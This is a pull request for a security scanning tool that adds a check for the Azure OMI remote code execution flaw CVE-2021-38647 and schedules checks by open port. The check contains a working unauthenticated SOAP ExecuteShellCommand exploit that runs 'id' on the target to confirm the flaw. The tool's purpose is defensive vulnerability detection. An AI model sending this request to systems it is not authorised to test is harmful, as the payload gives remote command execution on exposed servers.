### PR TITLE
Support for checks against open ports and check for Azure RCE

### DIFF
--- a/lib/checks/azure_open_management_cve_2021_38647.rb
+++ b/lib/checks/azure_open_management_cve_2021_38647.rb
@@ -1,0 +1,98 @@
+
+module Intrigue
+
+    module Issue
+      class AzureCve202138647 < BaseIssue
+        def self.generate(instance_details={})
+        {
+          added: "2021-09-17",
+          name: "azure_open_management_cve_2021_38647",
+          pretty_name: "Azure Open Management Infrastructure Remote Code Execution Vulnerability (CVE-2021-38647)",
+          identifiers: [
+            { type: "CVE", name: "CVE-2021-38647" }
+          ],
+          severity: 1,
+          status: "confirmed",
+          category: "vulnerability",
+          description: "A remote code execution vulnerability in Microsoft Azure Open Management Infrastructure has been identified. Successful exploitation allows attackes to execute arbitrary commands and compromise the entire server.",
+          remediation: "Disable public access to the Open Management Interface, typically on tcp ports 1270, 5985, and 5986.",
+          affected_software: [
+            { :vendor => "Microsoft", :product => "Azure"}
+          ],
+          references: [
+            { type: "description", uri: "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647" },
+            { type: "description", uri: "https://nvd.nist.gov/vuln/detail/CVE-2021-38647"},
+            { type: "description", uri: "https://www.rapid7.com/blog/post/2021/09/15/omigod-how-to-automatically-detect-and-fix-microsoft-azures-new-omi-vulnerability/"},
+            { type: "exploit", uri: "https://github.com/Immersive-Labs-Sec/cve-2021-38647"},
+          ],
+          authors: ["shpendk", "LucidUnicorn"]
+        }.merge!(instance_details)
+        end
+
+      end
+    end
+
+
+    module Task
+      class AzureCve202138647 < BaseCheck
+        def self.check_metadata
+          {
+            allowed_types: ["Uri", "NetworkService"],
+            example_entities: [{"type" => "Uri", "details" => {"name" => "https://intrigue.io"}}],
+            allowed_options: []
+          }
+        end
+
+        def check
+          # get enriched entity
+          url = "#{_get_entity_name}"
+          
+          headers={
+                "Content-Type": "application/soap+xml",
+          }
+
+          body = <<-EXPLOIT
+          <s:Envelope
+            xmlns:s="http://www.w3.org/2003/05/soap-envelope"
+            xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+            xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
+            xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+            xmlns:xsi="http://www.w3.org/2001/XMLSchema"
+            xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
+            xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
+          <s:Header>
+            <a:To>#{url}/wsman/</a:To>
+            <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
+            <a:ReplyTo>
+              <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+            </a:ReplyTo>
+            <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
+            <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
+            <a:MessageID>uuid:{uuid}</a:MessageID>
+            <w:OperationTimeout>PT1M30S</w:OperationTimeout>
+            <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
+            <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
+            <w:OptionSet s:mustUnderstand="true"/>
+            <w:SelectorSet>
+              <w:Selector Name="__cimnamespace">root/scx</w:Selector>
+            </w:SelectorSet>
+          </s:Header>
+          <s:Body>
+            <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
+              <p:command>id</p:command>
+              <p:timeout>0</p:timeout>
+            </p:ExecuteShellCommand_INPUT>
+          </s:Body>
+          </s:Envelope>
+          EXPLOIT
+
+          res = http_request :post , url, nil, headers, body, true, 60
+
+          _log "Got response #{res}"
+          require 'pry'; binding.pry
+        end
+
+      end
+    end
+
+  end

--- a/lib/checks/azure_open_management_cve_2021_38647.rb
+++ b/lib/checks/azure_open_management_cve_2021_38647.rb
@@ -45,50 +45,61 @@ module Intrigue
 
         def check
           # get enriched entity
-          url = "#{_get_entity_name}"
+          url = _get_entity_name
+          hostname = URI.parse(url).host
+          port = URI.parse(url).port
           
           headers={
                 "Content-Type": "application/soap+xml",
           }
 
           body = <<-EXPLOIT
-          <s:Envelope
-            xmlns:s="http://www.w3.org/2003/05/soap-envelope"
-            xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
-            xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
-            xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
-            xmlns:xsi="http://www.w3.org/2001/XMLSchema"
-            xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
-            xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
-          <s:Header>
-            <a:To>#{url}/wsman/</a:To>
-            <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
-            <a:ReplyTo>
-              <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
-            </a:ReplyTo>
-            <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
-            <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
-            <a:MessageID>uuid:{uuid}</a:MessageID>
-            <w:OperationTimeout>PT1M30S</w:OperationTimeout>
-            <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
-            <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
-            <w:OptionSet s:mustUnderstand="true"/>
-            <w:SelectorSet>
-              <w:Selector Name="__cimnamespace">root/scx</w:Selector>
-            </w:SelectorSet>
-          </s:Header>
-          <s:Body>
-            <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
-              <p:command>id</p:command>
-              <p:timeout>0</p:timeout>
-            </p:ExecuteShellCommand_INPUT>
-          </s:Body>
-          </s:Envelope>
-          EXPLOIT
+<s:Envelope
+  xmlns:s="http://www.w3.org/2003/05/soap-envelope"
+  xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+  xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
+  xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema"
+  xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
+  xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
+  >
+<s:Header>
+  <a:To>HTTP://#{hostname}:#{port}/wsman/</a:To>
+  <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
+  <a:ReplyTo>
+    <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+  </a:ReplyTo>
+  <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
+  <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
+  <a:MessageID>uuid:8c2f6345-65b9-47fd-9d14-647b537a0e83</a:MessageID>
+  <w:OperationTimeout>PT1M30S</w:OperationTimeout>
+  <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
+  <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
+  <w:OptionSet s:mustUnderstand="true"/>
+  <w:SelectorSet>
+    <w:Selector Name="__cimnamespace">root/scx</w:Selector>
+  </w:SelectorSet>
+</s:Header>
+<s:Body>
+  <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
+    <p:command>id</p:command>
+    <p:timeout>0</p:timeout>
+  </p:ExecuteShellCommand_INPUT>
+</s:Body>
+</s:Envelope>
+EXPLOIT
 
-          res = http_request :post , url, nil, headers, body, true, 60
+          #res = http_request :post , url, nil, headers, body, true, 60
+          r = Typhoeus::Request.new(
+          url,
+          method: :post,
+          body: body,
+          headers: headers,
+          ssl_verifyhost: 0,
+          ssl_verifypeer: false
+        ).run
 
-          _log "Got response #{res}"
+          _log "Got response #{r}"
           require 'pry'; binding.pry
         end
 

--- a/lib/checks/azure_open_management_cve_2021_38647.rb
+++ b/lib/checks/azure_open_management_cve_2021_38647.rb
@@ -19,6 +19,11 @@ module Intrigue
           affected_software: [
             { :vendor => "Microsoft", :product => "Azure"}
           ],
+          affected_ports: [
+            {:protocol => "tcp", :port_number => 1270},
+            {:protocol => "tcp", :port_number => 5985},
+            {:protocol => "tcp", :port_number => 5986}
+          ],
           references: [
             { type: "description", uri: "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647" },
             { type: "description", uri: "https://nvd.nist.gov/vuln/detail/CVE-2021-38647"},
@@ -44,10 +49,19 @@ module Intrigue
         end
 
         def check
-          # get enriched entity
-          url = _get_entity_name
-          hostname = URI.parse(url).host
-          port = URI.parse(url).port
+          # get entity details
+          if _get_entity_type_string == "Uri"
+            url = _get_entity_name
+            hostname = URI.parse(url).host
+            port = URI.parse(url).port
+          elsif _get_entity_type_string == "NetworkService"
+            hostname = _get_entity_detail "ip_address"
+            port = _get_entity_detail "port"
+            url = "https://#{hostname}:#{port}"
+          else
+            _log_error "Unsupported entity type"
+            return nil
+          end
           
           headers={
                 "Content-Type": "application/soap+xml",

--- a/lib/checks/azure_open_management_cve_2021_38647.rb
+++ b/lib/checks/azure_open_management_cve_2021_38647.rb
@@ -88,19 +88,17 @@ module Intrigue
 </s:Body>
 </s:Envelope>
 EXPLOIT
-
-          #res = http_request :post , url, nil, headers, body, true, 60
-          r = Typhoeus::Request.new(
-          url,
-          method: :post,
-          body: body,
-          headers: headers,
-          ssl_verifyhost: 0,
-          ssl_verifypeer: false
-        ).run
-
-          _log "Got response #{r}"
-          require 'pry'; binding.pry
+          _log "Making exploitation request."
+          res = http_request :post , url, nil, headers, body, true, 60
+          _log "Got response! Parsing data"
+          stdout = res.body_utf8[/<p:StdOut>(.*)<\/p:StdOut>/,1]
+          stderr = res.body_utf8[/<p:StdErr>(.*)<\/p:StdErr>/,1]
+          if stdout && stderr
+            _log "Target is vulnerable! Creating issue."
+            return {stdout: stdout, stderr: stderr}
+          else
+            _log "Target appears not vulnerable."
+          end
         end
 
       end

--- a/lib/issue_factory.rb
+++ b/lib/issue_factory.rb
@@ -44,6 +44,20 @@ module Intrigue
       end
 
       #
+      # Returns issues which have affected_ports set
+      #
+      def self.issues_for_open_port(protocol, port_number)
+        mapped_issues = []
+        self.issues.each do |h|
+          # generate the instances
+          hi = h.generate({})
+          ap = (hi[:affected_ports] || [])
+          mapped_issues << ap.map{|x| x.merge({ :name => hi[:name] }) }
+        end
+      mapped_issues.flatten.select{|x| x[:protocol].downcase == protocol.downcase && x[:port_number] == port_number}.map{|x| x[:name] }.uniq.compact
+      end
+
+      #
       # Provide the full list of issues, given a
       #
       def self.issues_for_vendor_product(vendor,product)

--- a/lib/tasks/enrich/network_service.rb
+++ b/lib/tasks/enrich/network_service.rb
@@ -38,7 +38,7 @@ class NetworkService < Intrigue::Task::BaseTask
     end
 
     port = entity_name.split(":").last.split("/").first.to_i
-    proto = entity_name.split(":").last.split("/").first.upcase
+    proto = entity_name.split(":").last.split("/").last.upcase
     net_name = _get_entity_detail("net_name")
 
     # check if the port is open, if not, hide this entity (its not a real NetworkService)
@@ -97,6 +97,7 @@ class NetworkService < Intrigue::Task::BaseTask
     # Okay, now kick off vulnerability checks (if project allows)
     if @project.vulnerability_checks_enabled
       vuln_checks = run_vuln_checks_from_fingerprint(fingerprint, @entity)
+      vuln_checks << run_vuln_checks_from_open_ports(proto, port, @entity)
       _set_entity_detail("vuln_checks", vuln_checks)
     end
 

--- a/lib/tasks/helpers/data.rb
+++ b/lib/tasks/helpers/data.rb
@@ -236,6 +236,7 @@ module Data
     tcp_ports << "995,"             # pops
     tcp_ports << "1090,"            # java rmi
     tcp_ports << "1098,"            # java rmi
+    tcp_ports << "1270,"            # azure omi
     tcp_ports << "4444,"            # java rmi
     tcp_ports << "1723,"            # pptp
     tcp_ports << "1883,"
@@ -261,6 +262,7 @@ module Data
     tcp_ports << "5556,"            # HP Data Protector
     tcp_ports << "5672,"
     tcp_ports << "5900,5901,"       # vnc
+    tcp_ports << "5985,5986,"       # azure omi
     tcp_ports << "6379,"            # redis
     tcp_ports << "6443,"
     tcp_ports << "7001,"            # Oracle WebLogic Server Listen Port for Administration Server

--- a/lib/tasks/helpers/ident.rb
+++ b/lib/tasks/helpers/ident.rb
@@ -44,6 +44,30 @@ module Ident
   all_checks.flatten.compact.uniq
   end
 
+  def run_vuln_checks_from_open_ports(protocol, open_port, entity)
+
+    all_checks = []
+    project = entity.project
+
+    _log "Getting checks for protocol: #{protocol} and open port: #{open_port}"
+    checks_to_be_run = Intrigue::Issue::IssueFactory.issues_for_open_port(protocol, open_port)
+
+    checks_to_be_run.flatten.compact.uniq.each do |check|
+
+      # if we want to pass check options based on some fingerprint crtieria
+      check_options = []
+
+      # get the scan result id ... TODO, ideally we'd track this.
+      existing_scan_result_id = nil
+
+      # start the task
+      start_task("task_autoscheduled", project, existing_scan_result_id, check, entity, 1, check_options)
+    end
+
+  # return a list of checks
+  all_checks.flatten.compact.uniq
+  end
+
   def create_issues_from_fingerprint_tags(fingerprint, entity)
 
     return unless fingerprint && entity

--- a/lib/tasks/helpers/services.rb
+++ b/lib/tasks/helpers/services.rb
@@ -35,9 +35,9 @@ module Services
     # before anything, check if port is open and return nil if not
     # note that we use tcp even for udp ports, because with udp we fire & hope for the best
     # this has been tested and tcp is reliable for detecting open udp ports
-    require 'pry'; binding.pry
-    return nil unless Intrigue::Ident::SimpleSocket.connect_tcp(ip_entity.name, port_num)
 
+    return nil unless Intrigue::Ident::SimpleSocket.connect_tcp(ip_entity.name, port_num)
+    _set_entity_detail("hidden_port_open_confirmed", true)
 
     # first, save the port details on the ip_entity
     ports = ip_entity.get_detail("ports") || []

--- a/lib/tasks/helpers/services.rb
+++ b/lib/tasks/helpers/services.rb
@@ -35,7 +35,8 @@ module Services
     # before anything, check if port is open and return nil if not
     # note that we use tcp even for udp ports, because with udp we fire & hope for the best
     # this has been tested and tcp is reliable for detecting open udp ports
-    return nil unless Intrigue::Ident::SimpleSocket.connect_tcp(ip_entity, port_num, 5)
+    require 'pry'; binding.pry
+    return nil unless Intrigue::Ident::SimpleSocket.connect_tcp(ip_entity.name, port_num)
 
 
     # first, save the port details on the ip_entity

--- a/util/bootstrap.sh
+++ b/util/bootstrap.sh
@@ -150,7 +150,7 @@ sudo apt-get -y --no-install-recommends install make \
 
 # Support older TLS ciphers
 sudo apt -y remove libcurl4
-sudo apt -y install libcurl4-gnutls-dev
+sudo apt -y install libcurl4-openssl-dev
 
 # NOTE! for whatever reason, this has to be with apt vs apt-get
 sudo apt -y install chromium-browser


### PR DESCRIPTION
This PR was supposed to just be a check for Azure's RCE `CVE-2021-38647`. However, because we don't have a fingerprint (and we won't be able to create one from what I could gather) and the issue is on a custom port, i created support for running checks against open ports. The basic idea is this:
1. Just like you can define `affected_software` on an Issue, you can define `affected_ports`
2. `affected_ports` is an array of protocol/port combinations
3. During enrichment of NetworkService entities, issues are queried and `affected_ports` is matched with the open port on the NetworkService entity.
4. The check is ran

I reckon this enables us to have more checks where an open port is enough for us to fire the check. Of course it would be ideal to fingerprint the service on said open port, but as in this case that's not always possible.

Ps: Typhoeus was failing to connect via https to the target, which is why i swapped `libcurl4-gnutls-dev` with `libcurl4-openssl-dev`. This works and from what I could tell doesn't affect other TSL connections. 